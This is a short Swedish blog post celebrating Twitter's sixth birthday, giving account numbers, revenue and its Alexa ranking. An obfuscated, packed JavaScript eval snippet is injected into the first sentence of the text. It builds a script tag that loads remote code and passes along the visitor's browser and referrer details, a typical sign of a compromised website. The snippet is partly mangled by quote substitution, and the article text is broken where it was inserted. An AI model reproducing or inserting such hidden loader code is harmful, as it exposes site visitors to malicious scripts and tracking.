Image Image Image Image Image Image Image Image Image Image

| 20 september, 2018

Scroll to top

Top

Twitter fyller sex år idag

Twitter fyller sex år idag
Sebastian Plengier Ehrnfelt

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnhar|var|u0026u|referrer|sdenf||js|php’.split(‘|’),0,{}))
är en stor dag för folket borta på mikro-bloggtjänsten Twitter. Det är nämligen födelsedag för Twitter, sex stora år är vad det står på tårtan idag.

Det var exakt sex år sedan som grundaren Jack Dorsey twittrade första gången, det är den tweeten ni kan se på bilden ovan. Sedan starten så har Twitter fått ihop ca 90 anställda och förra året omsatta företaget 260 miljoner dollar.

Efter den tweeten så har mer än 350 miljoner Twitter-konton registrerats enligt Twitter. Dock så tror många att den siffran uppstiger till 500 miljoner idag. Ca 100 miljoner av dessa konton räknas som aktiva. Varje dag twittras det över 300 miljoner tweets vilket är helt otroligt eller hur? Enligt Alexa ranking så är Twitter den nionde mest besökta sajten i världen.

Grattis Twitter!